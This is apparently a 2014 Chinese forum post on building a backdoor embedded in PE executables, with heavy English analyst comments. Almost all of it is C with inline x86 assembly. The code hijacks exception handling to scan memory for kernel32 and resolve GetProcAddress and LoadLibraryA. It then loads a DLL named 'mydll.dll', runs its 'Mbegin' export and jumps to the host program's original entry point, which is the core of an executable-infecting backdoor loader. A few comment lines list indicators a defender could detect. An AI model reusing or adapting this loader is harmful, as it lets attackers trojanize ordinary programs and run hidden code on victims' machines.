标题:
PE可执行文件的镶入式程序后门开发
作者:
大灰狼
时间:
2014-7-21 08:26
/*
利用异常结构处理搜索GetProcAddress入口地址
*/
#include <STDIO.H>
#include <WINDOWS.H>
main()
{
/*
 * Analyst note: this main() never returns.  It (1) registers a hand-built
 * SEH record whose handler is the second _asm block below, (2) triggers a
 * fault so that handler runs, (3) inside the handler scans memory from
 * 0x77000000 (then from 0xBFF00000) in 64 KiB steps for an MZ/PE image
 * whose export-directory name starts with "KERNEL32", walks that image's
 * export-name table for a name starting "GetProcA", then (4) jumps to
 * `exi`, resolves LoadLibraryA, loads "mydll.dll", calls its export
 * "Mbegin", and finally (5) jumps to the hard-coded address 0x401000.
 *
 * All state lives in raw [ebp-N] slots (no C locals are declared):
 *   [ebp-00h]         saved original fs:[0]  (SEH chain head)
 *   [ebp-04h]         saved original fs:[4]  (TIB StackBase)
 *   [ebp-08h]         procgetadd: resolved GetProcAddress, 0 until found
 *   [ebp-0Ch]         imgbase: current scan address / candidate image base
 *   [ebp-10h]         fnbase: VA of the image's IMAGE_EXPORT_DIRECTORY
 *   [ebp-14h]         k: scratch pointer / ordinal / RVA
 *   [ebp-18h]         l: export-name loop index
 *   [ebp-24h]         candidate base that passed the MZ read (used as hModule)
 *   [ebp-124h..118h]  16-byte buffer for the ASCII name being built
 *   [ebp-4008h]       GetProcAddress   [ebp-400Ch] LoadLibraryA
 *   [ebp-4030h]       Mbegin
 * NOTE(review): because main() declares no locals, every slot above lies
 * below main's own frame; the handler additionally runs on the exception
 * dispatcher's esp while using main's ebp.  This only holds together
 * because no path returns through a normal epilogue — confirm against the
 * generated prologue before relying on any of these offsets.
 *
 * Indicators a defender can key on: fs:[0] exchanged with a stack address
 * immediately followed by a deliberate write to address 0, and a 64 KiB
 * stride read scan of high user-mode addresses performed inside an SEH
 * handler that never returns to the dispatcher.
 */
_asm
{
call ex // ex returns with ecx = address of the next instruction (see label ex); used below to compute the handler address
mov eax,0x77000000 // imgbase = 0x77000000, start of the scan range
mov [ebp-0ch],eax
mov eax,esp
sub eax,8 // eax = esp-8: where the two pushes below will leave the new EXCEPTION_REGISTRATION record
xchg fs:[0],eax // install it as the SEH chain head; eax = previous head
mov DWORD ptr[ebp-00h],eax // save previous fs:[0] for the restore at the end of the handler ([ebp-0] is main's saved-EBP slot, presumably; never returned through)
mov eax,fs:[4]
mov DWORD ptr[ebp-04h],eax // save TIB StackBase (fs:[4]) for the same restore
mov fs:[4h],ebp // stash main's ebp in fs:[4] so the handler, which runs on a different esp, can find this frame
add ecx,34h // handler = (address after `call ex`) + 0x34; the 14 instructions from there to the end of this block encode to exactly 52 bytes, so this is the first instruction of the next _asm block — assumes the compiler emits these encodings unchanged
push ecx // record.handler
push eax // record.prev — note this pushes the fs:[4] value loaded above, not the previous SEH record
mov edx,0
mov byte ptr [edx],0 // deliberate write to address 0: the access violation transfers control to the handler
}
// Handler body.  Entered by the exception dispatcher on the first fault and
// re-entered on every fault the scan itself raises (unmapped imgbase); each
// entry restarts at e104f with procgetadd cleared and imgbase as left by the
// previous pass.  Control leaves only via `jne exi`, never by returning.
_asm
{
mov ebp,fs:[4] // recover main's ebp stashed above; esp is the dispatcher's, not main's
mov dword ptr [ebp-8h],0 // procgetadd = 0
//for(;imgbase<0xff000000,procgetadd==0;){   (author's pseudo-code; no 0xff000000 bound is actually emitted, only the procgetadd test below)
e104f:
cmp dword ptr [ebp-8h],0
jne exi // found: leave the handler by jumping straight into main's code at exi
//imgbase+=0x10000;   (64 KiB stride)
mov eax,[ebp-0ch]
add eax,10000h
mov [ebp-0ch],eax
//if(imgbase==0x78000000) imgbase=0xbff00000;   (end of first window -> start of second window)
cmp dword ptr [ebp-0ch],78000000h
jne is44
mov dword ptr [ebp-0ch],0BFF00000h
/*if(*( WORD *)imgbase=='ZM'&& *(WORD *)(imgbase+*(int
*)(imgbase+0x3c))=='EP'){*/
is44:
mov ecx,dword ptr [ebp-0ch]
xor edx,edx
mov dx,word ptr [ecx] // read e_magic; if imgbase is unmapped this faults and re-enters the handler
mov dword ptr [ebp-24h],ecx // remember this candidate base (read back at exi as the kernel32 hModule)
cmp edx,5A4Dh
//"MZ"
jne e11db
mov eax,[ebp-0ch]
mov ecx,dword ptr [eax+3Ch] // e_lfanew
mov edx,dword ptr [ebp-0ch]
xor eax,eax
mov ax,word ptr [edx+ecx]
cmp eax,4550h // "PE"
jne e11db
//fnbase=*(int *)(imgbase+*(int *)(imgbase+0x3c)+0x78)+imgbase;   (0x78 from the PE signature = DataDirectory[0].VirtualAddress, the export table RVA, in a PE32 header)
mov ecx,dword ptr [ebp-0ch]
mov edx,dword ptr [ecx+3Ch]
mov eax,[ebp-0ch]
mov ecx,dword ptr [eax+edx+78h]
add ecx,dword ptr [ebp-0ch]
mov dword ptr [ebp-10h],ecx
// k=*(int *)(fnbase+0xc)+imgbase;   (export_dir.Name: RVA of the module's own DLL name string)
mov edx,dword ptr [ebp-10h]
mov eax,dword ptr [edx+0Ch]
add eax,dword ptr [ebp-0ch]
mov dword ptr [ebp-14h],eax
//if(*(int *)k =='NREK'&&*(int *)(k+4)=='23LE'){   (DLL name begins "KERNEL32")
mov ecx,dword ptr [ebp-14h]
cmp dword ptr [ecx],4E52454Bh // "KERN"
jne e11db
mov edx,dword ptr [ebp-14h]
cmp dword ptr [edx+4],32334C45h // "EL32"
jne e11db
//k=imgbase+*(int *)(fnbase+0x20);   (export_dir.AddressOfNames)
mov eax,dword ptr [ebp-10h]
mov ecx,dword ptr [ebp-0ch]
add ecx,dword ptr [eax+20h]
mov dword ptr [ebp-14h],ecx
//for(l=0;l<*(int *) (fnbase+0x18);++l,k+=4){   (export_dir.NumberOfNames)
mov dword ptr [ebp-18h],0
jmp e1127
e1115: // loop increment: ++l, k += 4
mov edx,dword ptr [ebp-18h]
add edx,1
mov dword ptr [ebp-18h],edx
mov eax,dword ptr [ebp-14h]
add eax,4
mov dword ptr [ebp-14h],eax
e1127: // loop condition: l < NumberOfNames (signed compare, matching the author's `int l`)
mov ecx,dword ptr [ebp-10h]
mov edx,dword ptr [ebp-18h]
cmp edx,dword ptr [ecx+18h]
jge e11db
/*if(*(int *)(imgbase+*(int *)k)=='tixE'&&*(int *)(4+imgbase+*(int
*)k)=='corP'){GetProcAddress*/
// NOTE: the pseudo-code above says 'tixE'/'corP' but the emitted constants are
// 'PteG'/'Acor', i.e. only the first 8 bytes of the export name are compared
// against "GetProcA".
mov eax,dword ptr [ebp-14h]
mov ecx,dword ptr [eax] // RVA of the l-th export name
mov edx,dword ptr [ebp-0ch]
cmp dword ptr [edx+ecx],'PteG' // bytes "GetP" (MSVC multi-char literal: last char in the lowest byte)
jne e11d6
mov eax,dword ptr [ebp-14h]
mov ecx,dword ptr [eax]
mov edx,dword ptr [ebp-0ch]
cmp dword ptr [edx+ecx+4],'Acor' // bytes "rocA"
jne e11d6
//k=*(WORD *)(l+l+imgbase+*(int *)(fnbase+0x24));   (export_dir.AddressOfNameOrdinals[l])
mov eax,dword ptr [ebp-18h]
add eax,dword ptr [ebp-18h]
add eax,dword ptr [ebp-0ch]
mov ecx,dword ptr [ebp-10h]
mov edx,dword ptr [ecx+24h]
xor ecx,ecx
mov cx,word ptr [eax+edx]
mov dword ptr [ebp-14h],ecx
//k+=*(int *)(fnbase+0x10)-1;   (export_dir.Base - 1)
mov edx,dword ptr [ebp-10h]
mov eax,dword ptr [edx+10h]
mov ecx,dword ptr [ebp-14h]
lea edx,dword ptr [ecx+eax-1]
mov dword ptr [ebp-14h],edx
//k=*(int *)(k+k+k+k+imgbase+*(int *)(fnbase+0x1c));   (export_dir.AddressOfFunctions[k]: RVA of the function)
mov eax,dword ptr [ebp-14h]
add eax,dword ptr [ebp-14h]
add eax,dword ptr [ebp-14h]
add eax,dword ptr [ebp-14h]
add eax,dword ptr [ebp-0ch]
mov ecx,dword ptr [ebp-10h]
mov edx,dword ptr [ecx+1Ch]
mov eax,dword ptr [eax+edx]
mov dword ptr [ebp-14h],eax
mov edx,dword ptr [ebp-14h]
//add edx,imgbase   (RVA -> VA)
add edx,dword ptr [ebp-0ch]
// mov procgetadd,edx
mov dword ptr [ebp-8h],edx
//restore the SEH chain head and StackBase saved in the first block
mov eax,DWORD ptr[ebp-00h]
mov fs:[0],eax
mov eax,DWORD ptr[ebp-04h]
mov fs:[4],eax
jmp e11db
e11d6:
jmp e1115 // next export name
e11db:
jmp e104f // next 64 KiB step / exit test
}
//////////////////////////////////////////////////////////////
exi:
//Resolve LoadLibraryA: GetProcAddress(kernel32_base, "LoadLibraryA")
_asm
{
mov dword ptr [ebp-124h],'daoL' // bytes "Load"
mov dword ptr [ebp-120h],'rbiL' // bytes "Libr"
mov dword ptr [ebp-11Ch],'Ayra' // bytes "aryA"
mov dword ptr [ebp-118h],0000h // terminator -> "LoadLibraryA\0"
lea eax,[ebp-124h]
push eax // lpProcName
mov ebx,dword ptr [ebp-24h]
//kernel32.dll base address saved by the scan
push ebx // hModule
mov eax,dword ptr [ebp-8h]
mov dword ptr [ebp-4008h],eax
//GetProcAddress entry address, kept for the second lookup below
call eax // stdcall: callee pops both arguments
mov dword ptr [ebp-400ch],eax
//LoadLibraryA entry address
}
//LoadLibraryA("mydll.dll"); on success look up and call its export "Mbegin"
_asm
{
mov dword ptr [ebp-124h],'ldym' // bytes "mydl"
mov dword ptr [ebp-120h],'ld.l' // bytes "l.dl"
mov dword ptr [ebp-11Ch],'l' // bytes "l\0\0\0"
mov dword ptr [ebp-118h],0000h // -> "mydll.dll\0"
lea eax,[ebp-124h]
push eax // lpLibFileName
call dword ptr [ebp-400ch] // LoadLibraryA
cmp eax,0
jz exit1 // load failed: go straight to the final jump
mov ebx,eax // hModule of mydll.dll
//Look up the export: the author's comment says "mybegin", but the bytes written spell "Mbegin"
mov dword ptr [ebp-124h],'gebM' // bytes "Mbeg"
mov dword ptr [ebp-120h],'ni' // bytes "in\0\0"
mov dword ptr [ebp-11Ch],0000h
mov dword ptr [ebp-118h],0000h
lea eax,[ebp-124h]
push eax // lpProcName
push ebx // hModule
call dword ptr [ebp-4008h] // GetProcAddress
mov dword ptr [ebp-4030h],eax
//Mbegin entry address
cmp eax,0
jz exit1 // export not found
call eax
//run Mbegin; execution continues here only if it returns
jmp exit1
}
ex:
//Helper for the first block: returns with ecx = its own return address
_asm
{
pop ecx // ecx = return address = address of the instruction after `call ex`
push ecx
ret
}
exit1:
//Final transfer to the hard-coded address 0x401000 (presumably the host program's
//original entry point; the author notes it must be edited per target binary)
_asm
{
mov eax,0x401000
//this jump address must be changed in the code
jmp eax
}
return 0; // unreachable: every path above ends in `jmp eax`
}